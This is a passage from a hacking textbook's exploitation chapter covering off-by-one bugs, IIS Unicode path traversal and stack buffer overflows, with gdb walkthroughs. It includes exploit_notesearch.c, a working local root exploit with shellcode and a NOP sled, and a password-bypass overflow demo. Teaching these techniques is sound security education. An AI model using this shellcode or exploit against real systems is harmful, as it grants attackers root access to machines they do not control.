-=-={ New Player Registration }=-=-
Enter your name: Jon Erickson

Welcome to the Game of Chance, Jon Erickson.
You have been given 100 credits.
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 100 credits] ->  1

[DEBUG] current_game pointer @ 0x08048e6e

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: 7
The winning number is 14.
Sorry, you didn't win.

You now have 90 credits.
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 90 credits] ->  2

[DEBUG] current_game pointer @ 0x08048f61

::::::: No Match Dealer :::::::
In this game you can wager up to all of your credits.
The dealer will deal out 16 random numbers between 0 and 99.
If there are no matches among them, you double your money!

How many of your 90 credits would you like to wager?  30
                ::: Dealing out 16 random numbers :::
88      68      82      51      21      73      80      50
11      64      78      85      39      42      40      95
There were no matches! You win 30 credits!

You now have 120 credits
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 120 credits] ->  3

[DEBUG] current_game pointer @ 0x0804914c
******* Find the Ace *******
In this game you can wager up to all of your credits.
Three cards will be dealt: two queens and one ace.
If you find the ace, you will win your wager.
After choosing a card, one of the queens will be revealed.
At this point you may either select a different card or
increase your wager.

How many of your 120 credits would you like to wager?  50

        *** Dealing cards ***
        ._.     ._.     ._.
Cards:  |X|     |X|     |X|
         1       2       3
Select a card: 1, 2, or 3:  2

        *** Revealing a queen ***
        ._.     ._.     ._.
Cards:  |X|     |X|     |Q|
                 ^-- your pick
Would you like to
[c]hange your pick      or      [i]ncrease your wager?
Select c or i:  c
Your card pick has been changed to card 1.

        *** End result ***

        ._.     ._.     ._.
Cards:  |A|     |Q|     |Q|
         ^-- your pick
You have won 50 credits from your first wager.

You now have 170 credits.
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] ->  4

====================| HIGH SCORE |====================
You currently have the high score of 170 credits!
======================================================

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] ->  7

Thanks for playing! Bye.
reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ ./game_of_chance
-=-={ New Player Registration }=-=-
Enter your name: Jose Ronnick

Welcome to the Game of Chance Jose Ronnick.
You have been given 100 credits.
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] ->  4
====================| HIGH SCORE |====================
Jon Erickson has the high score of 170.
======================================================

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] ->  7

Thanks for playing! Bye.
jose@hacking:~/booksrc $ exit
exit 
reader@hacking:~/booksrc $

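Play around with this program a little bit. The Find the Ace game is a demonstration of a principle of conditional probability; although it is counterintuitive, changing your pick will increase your chances of finding the ace from 33 percent to about 67 percent, because the revealed queen is never your own card, so the remaining card holds the ace whenever your first pick was a queen. Many people have difficulty understanding this truth, and that's why it is counterintuitive. The secret of hacking is understanding little-known truths like this and using them to produce seemingly magical results.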

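Chapter 0x300. Exploitation

Program exploitation is a staple of hacking. As demonstrated in the previous chapter, a program is made up of a complex set of rules following a certain execution flow that ultimately tells the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Since a program can really only do what it's designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places.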

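A program can only do what it's programmed to do, to the letter of the law. Unfortunately, what's written doesn't always coincide with what the programmer intended the program to do. This principle can be explained with a joke:

A man is walking through the woods, and he finds a magic lamp on the ground. Instinctively, he picks the lamp up, rubs the side of it with his sleeve, and out pops a genie. The genie thanks the man for freeing him and offers to grant him three wishes. The man is ecstatic and knows exactly what he wants.

"First," says the man, "I want a billion dollars."

The genie snaps his fingers and a briefcase full of money materializes out of thin air.

The man is wide-eyed in amazement and continues, "Next, I want a Ferrari."

The genie snaps his fingers and a Ferrari appears from a puff of smoke.

The man continues, "Finally, I want to be irresistible to women."

The genie snaps his fingers and the man turns into a box of chocolates.

Just as the man's final wish was granted based on what he said, rather than what he was thinking, a program will follow its instructions exactly, and the results aren't always what the programmer intended. Sometimes the repercussions can be catastrophic.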

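Programmers are human, and sometimes what they write isn't exactly what they mean. For example, one common programming error is called an off-by-one error. As the name implies, it's an error where the programmer has miscounted by one. This happens more often than you might think, and it is best illustrated with a question: If you're building a 100-foot fence, with fence posts spaced 10 feet apart, how many fence posts do you need? The obvious answer is 10 fence posts, but this is incorrect, since you actually need 11. This type of off-by-one error is commonly called a fencepost error, and it occurs when a programmer mistakenly counts items instead of spaces between items, or vice versa. Another example is when a programmer is trying to select a range of numbers or items for processing, such as items N through M. If N = 5 and M = 17, how many items are there to process? The obvious answer is M - N, or 17 - 5 = 12 items. But this is incorrect, since there are actually M - N + 1 items, for a total of 13 items. This seems counterintuitive at first glance, and that's exactly why these errors happen.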

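Often, fencepost errors go unnoticed because programs aren't tested for every single possibility, and the effects of a fencepost error don't generally occur during normal program execution. However, when the program is fed the input that makes the effects of the error manifest, the consequences of the error can have an avalanche effect on the rest of the program logic. When properly exploited, an off-by-one error can cause a seemingly secure program to become a security vulnerability.

One classic example of this is OpenSSH, which is meant to be a secure terminal communication program suite, designed to replace insecure and unencrypted services such as telnet, rsh, and rcp. However, there was an off-by-one error in the channel-allocation code that was heavily exploited. Specifically, the code included an if statement that read: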

if (id < 0 || id > channels_alloc) {

It should have been

if (id < 0 || id >= channels_alloc) {

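In plain English, the code reads "If the ID is less than 0 or the ID is greater than the channels allocated, do the following stuff," when it should have been "If the ID is less than 0 or the ID is greater than or equal to the channels allocated, do the following stuff."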

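This simple off-by-one error allowed further exploitation of the program, so that a normal user authenticating and logging in could gain full administrative rights to the system. This type of functionality certainly wasn't what the programmers had intended for a secure program like OpenSSH, but a computer can only do what it's told.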

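Another situation that seems to breed exploitable programmer errors is when a program is quickly modified to expand its functionality. While this increase in functionality makes the program more marketable and increases its value, it also increases the program's complexity, which increases the chances of an oversight. Microsoft's IIS webserver program is designed to serve static and interactive web content to users. In order to accomplish this, the program must allow users to read, write, and execute programs and files within certain directories; however, this functionality must be limited to those particular directories. Without this limitation, users would have full control of the system, which is obviously undesirable from a security perspective. To prevent this situation, the program has path-checking code designed to prevent users from using the backslash character to traverse backward through the directory tree and enter other directories.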

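With the addition of support for the Unicode character set, though, the complexity of the program continued to increase. Unicode is a double-byte character set designed to provide characters for every language, including Chinese and Arabic. By using two bytes for every character instead of just one, Unicode allows for tens of thousands of possible characters, as opposed to the few hundred allowed by single-byte characters. This additional complexity means that there are now multiple representations of the backslash character. For example, %5c in Unicode translates to the backslash character, but this translation was done after the path-checking code was run. So by using %5c instead of \, it was indeed possible to traverse directories, allowing the aforementioned security dangers. Both the Sadmind worm and the CodeRed worm used this type of Unicode conversion oversight to deface web pages.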

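A related example of this letter-of-the-law principle used outside the realm of computer programming is the LaMacchia Loophole. Just like the rules of a computer program, the US legal system sometimes has rules that don't say exactly what their creators intended, and like a computer program exploit, these legal loopholes can be used to sidestep the intent of the law. Near the end of 1993, a 21-year-old computer hacker and student at MIT named David LaMacchia set up a bulletin board system called Cynosure for the purposes of software piracy. Those who had software to give would upload it, and those who wanted software would download it. The service was only online for about six weeks, but it generated heavy network traffic worldwide, which eventually attracted the attention of university and federal authorities. Software companies claimed that they lost one million dollars as a result of Cynosure, and a federal grand jury charged LaMacchia with one count of conspiring with unknown persons to violate the wire fraud statute. However, the charge was dismissed because what LaMacchia was alleged to have done wasn't criminal conduct under the Copyright Act, since the infringement was not for the purpose of commercial advantage or private financial gain. Apparently, the lawmakers had never anticipated that someone might engage in these types of activities with a motive other than personal financial gain. (Congress closed this loophole in 1997 with the No Electronic Theft Act.) Even though this example doesn't involve the exploiting of a computer program, the judges and courts can be thought of as computers executing the program of the legal system as it was written. The abstract concepts of hacking transcend computing and can be applied to many other aspects of life that involve complex systems.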

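Generalized Exploit Techniques

Off-by-one errors and improper Unicode expansion are all mistakes that can be hard to see at the time but are glaringly obvious to any programmer in hindsight. However, there are some common mistakes that can be exploited in ways that aren't so obvious. The impact of these mistakes on security isn't always apparent, and these security problems are found in code everywhere. Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and they can be used in a variety of situations.

Most program exploits have to do with memory corruption. These include common exploit techniques like buffer overflows as well as less common methods like format string exploits. With these techniques, the ultimate goal is to take control of the target program's execution flow by tricking it into running a piece of malicious code that has been smuggled into memory. This type of process hijacking is known as execution of arbitrary code, since the hacker can cause a program to do pretty much anything he or she wants it to. Like the LaMacchia Loophole, these types of vulnerabilities exist because there are specific unexpected cases that the program can't handle. Under normal conditions, these unexpected cases cause the program to crash, metaphorically driving the execution flow off a cliff. But if the environment is carefully controlled, the execution flow can be controlled, preventing the crash and reprogramming the process.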

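Buffer Overflows

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were moved over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that has only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example.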

overflow_example.c

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
   int value = 5;
   char buffer_one[8], buffer_two[8];

   strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */
   strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */

   printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
   printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
   printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

   printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));
   strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */

   printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
   printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
   printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value); 
}

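By now, you should be able to read the source code above and figure out what the program does. After compilation in the sample output below, we try to copy ten bytes from the first command-line argument into buffer_two, which only has eight bytes allocated for it.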

reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example.c 
reader@hacking:~/booksrc $ ./overflow_example 1234567890
[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'
[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)

[STRCPY] copying 10 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'
[AFTER] buffer_one is at 0xbffff7f8 and contains '90'
[AFTER] value is at 0xbffff804 and is 5 (0x00000005)
reader@hacking:~/booksrc $

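Notice that buffer_one is located directly after buffer_two in memory, so when ten bytes are copied into buffer_two, the last two bytes, 90, overflow into buffer_one and overwrite whatever was there.

A larger input will naturally overflow into the other variables, but if the input is large enough, the program will crash and die.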

reader@hacking:~/booksrc $ ./overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 29 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

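These types of program crashes are fairly common: think of all of the times a program has crashed or blue-screened on you. The programmer's mistake is one of omission; there should be a length check or restriction on the user-supplied input. These kinds of mistakes are easy to make and can be difficult to spot. In fact, the notesearch.c program contains a buffer overflow bug. You might not have noticed this until right now, even if you were already familiar with C.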

reader@hacking:~/booksrc $ ./notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

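Program crashes are annoying, but in the hands of a hacker they can become downright dangerous. A knowledgeable hacker can take control of a program as it crashes, with some surprising results. The exploit_notesearch.c code demonstrates the danger.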

exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // Zero out the new memory.

   strcpy(command, "./notesearch \'"); // Start command buffer.
   buffer = command + strlen(command); // Set buffer at the end.

   if(argc > 1) // Set offset.
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // Set return address.

   for(i=0; i < 160; i+=4) // Fill buffer with return address.
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // Build NOP sled.
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");

   system(command); // Run exploit.
   free(command);
}

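This exploit's source code will be explained in depth later, but in general, it just generates a command string that will execute the notesearch program with a command-line argument between single quotes. It uses string functions to do this: strlen() to get the current length of the string (to position the buffer pointer) and strcat() to concatenate the closing single quote to the end. Finally, the system() function is used to execute the command string. The buffer that is generated between the single quotes is the real meat of the exploit. The rest is just a delivery method for this poison pill of data. Watch what a controlled crash can do.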

reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#

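The exploit is able to use the overflow to serve up a root shell, providing full control over the computer. This is an example of a stack-based buffer overflow exploit.

Stack-Based Buffer Overflow Vulnerabilities

The notesearch exploit works by corrupting memory to control execution flow. The auth_overflow.c program demonstrates this concept.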

auth_overflow.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
   int auth_flag = 0;
   char password_buffer[16];

   strcpy(password_buffer, password);

   if(strcmp(password_buffer, "brillig") == 0)
      auth_flag = 1;
   if(strcmp(password_buffer, "outgrabe") == 0)
      auth_flag = 1;

   return auth_flag;
}

int main(int argc, char *argv[]) {
   if(argc < 2) {
      printf("Usage: %s <password>\n", argv[0]);
      exit(0);
   }
   if(check_authentication(argv[1])) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
      printf("      Access Granted.\n");
      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
   } else {
      printf("\nAccess Denied.\n");
   }
}

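This example program accepts a password as its only command-line argument and then calls a check_authentication() function. This function allows two passwords, meant to be representative of multiple authentication methods. If either of these passwords is used, the function returns 1, which grants access. You should be able to figure most of that out just by looking at the source code before compiling it. Use the -g option when you do compile it, though, since we will be debugging this program later.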

reader@hacking:~/booksrc $ gcc -g -o auth_overflow auth_overflow.c
reader@hacking:~/booksrc $ ./auth_overflow
Usage: ./auth_overflow <password>
reader@hacking:~/booksrc $ ./auth_overflow test

Access Denied.
reader@hacking:~/booksrc $ ./auth_overflow brillig

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $ ./auth_overflow outgrabe

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $

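So far, everything works as the source code says it should. This is to be expected from something as deterministic as a computer program. But an overflow can lead to unexpected and even contradictory behavior, allowing access without a proper password.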

reader@hacking:~/booksrc $ ./auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $

You may have already figured out what happened, but let's look at it with a debugger to see the specifics.

reader@hacking:~/booksrc $ gdb -q ./auth_overflow
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4
5       int check_authentication(char *password) {
6               int auth_flag = 0;
7               char password_buffer[16];
8
9               strcpy(password_buffer, password);
10
(gdb)
11              if(strcmp(password_buffer, "brillig") == 0)
12                      auth_flag = 1;
13              if(strcmp(password_buffer, "outgrabe") == 0)
14                      auth_flag = 1;
15
16              return auth_flag;
17      }
18
19      int main(int argc, char *argv[]) {
20              if(argc < 2) {
(gdb) break 9
Breakpoint 1 at 0x8048421: file auth_overflow.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x804846f: file auth_overflow.c, line 16.
(gdb)

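The GDB debugger is started with the -q option to suppress the welcome banner, and breakpoints are set on lines 9 and 16. When the program is run, execution will pause at these breakpoints and give us a chance to examine memory.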

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at
auth_overflow.c:9
9               strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0:      ")????o??????)\205\004\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0:     0xb7f9f729      0xb7fd6ff4      0xbffff7d8      0x08048529
0xbffff7b0:     0xb7fd6ff4      0xbffff870      0xbffff7d8      0x00000000
0xbffff7c0:     0xb7ff47b0      0x08048510      0xbffff7d8      0x080484bb
0xbffff7d0:     0xbffff9af      0x08048510      0xbffff838      0xb7eafebc
(gdb)

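The first breakpoint is before the strcpy() happens. By examining the password_buffer pointer, the debugger shows it is filled with random uninitialized data and is located at 0xbffff7a0 in memory. By examining the address of the auth_flag variable, we can see both its location at 0xbffff7bc and its value of 0. The print command can be used to do arithmetic and shows that auth_flag is 28 bytes past the start of password_buffer. This relationship can also be seen in the block of memory starting at password_buffer: auth_flag is the fourth word on the second row, at 0xbffff7bc.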

(gdb) continue
Continuing.

Breakpoint 2, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at
auth_overflow.c:16
16              return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0:      'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc:     0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0x41414141      0x41414141      0x00004141
0xbffff7c0:     0xb7ff47b0      0x08048510      0xbffff7d8      0x080484bb
0xbffff7d0:     0xbffff9af      0x08048510      0xbffff838      0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc:     65 'A'  65 'A'  0 '\0'  0 '\0'
(gdb) x/dw &auth_flag
0xbffff7bc:     16705
(gdb)

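Continuing to the next breakpoint, found after the strcpy(), these memory locations are examined again. The password_buffer overflowed into auth_flag, changing its first two bytes to 0x41. The value 0x00004141 might look backward again, but remember that x86 is a little-endian architecture, so it's supposed to look that way. If you examine each of these four bytes individually, you can see how the memory is actually laid out. Ultimately, the program will treat this value as an integer, with a value of 16705.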

(gdb) continue
Continuing.

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-

Program exited with code 034.
(gdb)

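After the overflow, the check_authentication() function returns 16705 instead of 0. Since the if statement treats any nonzero value as authenticated, the program's execution flow is steered into the authenticated section. In this example, the auth_flag variable is the execution control point, since overwriting this value is the source of the control.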

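But this is a very contrived example that depends on the memory layout of the variables. In auth_overflow2.c, the variables are declared in reverse order. (The order of the two declarations is the only change from auth_overflow.c.)

auth_overflow2.c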

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
   char password_buffer[16];
   int auth_flag = 0;

   strcpy(password_buffer, password);

   if(strcmp(password_buffer, "brillig") == 0)
      auth_flag = 1;
   if(strcmp(password_buffer, "outgrabe") == 0)
      auth_flag = 1;

   return auth_flag;
}

int main(int argc, char *argv[]) {
   if(argc < 2) {
      printf("Usage: %s <password>\n", argv[0]);
      exit(0);
   }
   if(check_authentication(argv[1])) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
      printf("      Access Granted.\n");
      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
   } else {
      printf("\nAccess Denied.\n");
   }
}

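This simple change puts the auth_flag variable before password_buffer in memory. This eliminates the use of the auth_flag variable as an execution control point, since it can no longer be corrupted by an overflow.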

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4
5       int check_authentication(char *password) {
6               char password_buffer[16];
7               int auth_flag = 0;
8
9               strcpy(password_buffer, password);
10
(gdb)
11              if(strcmp(password_buffer, "brillig") == 0)
12                      auth_flag = 1;
13              if(strcmp(password_buffer, "outgrabe") == 0)
14                      auth_flag = 1;
15
16              return auth_flag;
17      }
18
19      int main(int argc, char *argv[]) {
20              if(argc < 2) {
(gdb) break 9
Breakpoint 1 at 0x8048421: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x804846f: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at
auth_overflow2.c:9
9               strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7c0:      "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\
bH???????\002"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) x/16xw &auth_flag
0xbffff7bc:     0x00000000      0xb7fd6ff4      0xbffff880      0xbffff7e8
0xbffff7cc:     0xb7fd6ff4      0xb7ff47b0      0x08048510      0xbffff7e8
0xbffff7dc:     0x080484bb      0xbffff9b7      0x08048510      0xbffff848
0xbffff7ec:     0xb7eafebc      0x00000002      0xbffff874      0xbffff880 
(gdb)

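Similar breakpoints are set, and an examination of memory shows that auth_flag (the first word of the dumps above and below, at 0xbffff7bc) is located before password_buffer in memory. This means auth_flag can never be overwritten by an overflow in password_buffer.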

(gdb) cont
Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
    at auth_overflow2.c:16
16              return auth_flag;
(gdb) x/s password_buffer
0xbffff7c0:      'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) x/16xw &auth_flag
0xbffff7bc:     0x00000000      0x41414141      0x41414141      0x41414141
0xbffff7cc:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7dc:     0x08004141      0xbffff9b7      0x08048510      0xbffff848
0xbffff7ec:     0xb7eafebc      0x00000002      0xbffff874      0xbffff880 
(gdb)

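As expected, the overflow cannot disturb the auth_flag variable, since it is located before the buffer. But another execution control point does exist, even though you can't see it in the C code. It is conveniently located after all the stack variables, so it can easily be overwritten. This memory is integral to the operation of all programs, so it exists in all programs, and when it is overwritten, the usual result is a program crash.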

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb)

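Recall from the previous chapter that the stack is one of five memory segments used by programs. The stack is a FILO (first in, last out) data structure used to maintain execution flow and context for local variables during function calls. When a function is called, a structure called a stack frame is pushed onto the stack, and the EIP register jumps to the first instruction of the function. Each stack frame contains the local variables for that function and a return address so EIP can be restored. When the function is done, the stack frame is popped off the stack and the return address is used to restore EIP. All of this is built into the architecture and is usually handled by the compiler, not the programmer.

When the check_authentication() function is called, a new stack frame is pushed onto the stack above main()'s stack frame. This frame holds the local variables, a return address, and the function's arguments.

We can see all these elements in the debugger.

Figure 0x300-1.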

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4
5       int check_authentication(char *password) {
6               char password_buffer[16];
7               int auth_flag = 0;
8
9               strcpy(password_buffer, password);
10
(gdb)
11              if(strcmp(password_buffer, "brillig") == 0)
12                      auth_flag = 1;
13              if(strcmp(password_buffer, "outgrabe") == 0)
14                      auth_flag = 1;
15
16              return auth_flag;
17      }
18
19      int main(int argc, char *argv[]) {
20              if(argc < 2) {
(gdb)
21                      printf("Usage: %s <password>\n", argv[0]);
22                      exit(0);
23              }
24              if(check_authentication(argv[1])) {
25                      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
26                      printf("      Access Granted.\n");
27                      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
28              } else {
29                      printf("\nAccess Denied.\n");
30              }
(gdb) break 24
Breakpoint 1 at 0x80484ab: file auth_overflow2.c, line 24.
(gdb) break 9
Breakpoint 2 at 0x8048421: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 3 at 0x804846f: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2.c:24
24              if(check_authentication(argv[1])) {
(gdb) i r esp
esp            0xbffff7e0       0xbffff7e0
(gdb) x/32xw $esp
0xbffff7e0:     0xb8000ce0      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff820:     0x40f5f7f0      0x48e0fe81      0x00000000      0x00000000
0xbffff830:     0x00000000      0xb7ff9300      0xb7eafded      0xb8000ff4
0xbffff840:     0x00000002      0x08048350      0x00000000      0x08048371
0xbffff850:     0x08048474      0x00000002      0xbffff874      0x08048510 
(gdb)

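The first breakpoint is right before the call to check_authentication() in main(). At this point, the stack pointer register (ESP) is 0xbffff7e0, and the top of the stack is shown. This is all part of main()'s stack frame. Continuing to the next breakpoint inside check_authentication(), the output below shows that ESP is smaller, having moved up the list of memory to make room for check_authentication()'s stack frame (the memory from 0xbffff7a0 up to 0xbffff7e0), which is now on the stack. After finding the addresses of the auth_flag variable (0xbffff7bc) and the password_buffer variable (0xbffff7c0), their locations can be seen within the stack frame.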

(gdb) c
Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at
auth_overflow2.c:9
9               strcpy(password_buffer, password);
(gdb) i r esp
esp            0xbffff7a0       0xbffff7a0
(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      0x08049744      0xbffff7b8      0x080482d9
0xbffff7b0:     0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000
0xbffff7c0:     0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4
